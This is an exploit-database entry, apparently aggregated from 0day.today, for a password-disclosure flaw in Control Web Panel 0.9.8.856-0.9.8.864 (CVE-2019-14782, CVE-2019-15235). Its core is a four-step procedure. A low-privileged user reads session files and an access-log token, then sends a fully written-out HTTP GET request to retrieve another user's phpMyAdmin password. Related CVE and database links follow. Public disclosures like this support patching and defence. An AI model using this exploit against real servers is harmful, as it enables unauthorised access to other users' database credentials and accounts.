Lucene search
Pongtorn Angsuchotmetee1337DAY-ID-33664HistoryDec 17, 2019 - 12:00 a.m.
Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure Vulnerability
2019-12-1700:00:00
Pongtorn Angsuchotmetee
0day.today
77
0.001 Low
EPSS
Percentile
23.1%
Exploit for php platform in category web applications
Exploit Title : CWP (Control Web Panel) phpMyAdmin password access
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Version : 0.9.8.856 - 0.9.8.864
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number : CVE-2019-14782, CVE-2019-15235
Reference : N/A
1. Login as an low privileged user
2. Get Session file name from path "/tmp" or /home/[USERNAME]/tmp/session/sess_xxxxxx"
3. Get token value from "/usr/local/cwpsrv/logs/access_log"
4. Make a request to obtain target password
GET /cwp_[token]/victim?module=pma HTTP/1.1
Host: 192.168.1.1:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Referer: https://192.168.1.1:2083/
Cookie: PHPSESSID=[sess_xxxxxx]
# 0day.today [2019-12-17] #Related
cvelist
cvelist
CVE-2019-15235
2019-12-17 15:20:18
CVE-2019-14782
2019-12-17 15:25:33
cve
cve
CVE-2019-15235
2019-12-17 16:15:12
CVE-2019-14782
2019-12-17 16:15:12
packetstorm
packetstorm
Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure
2019-12-16 00:00:00
prion
prion
Design/Logic Flaw
2019-12-17 16:15:00
Cross site request forgery (csrf)
2019-12-17 16:15:00
nvd
nvd
CVE-2019-15235
2019-12-17 16:15:12
CVE-2019-14782
2019-12-17 16:15:12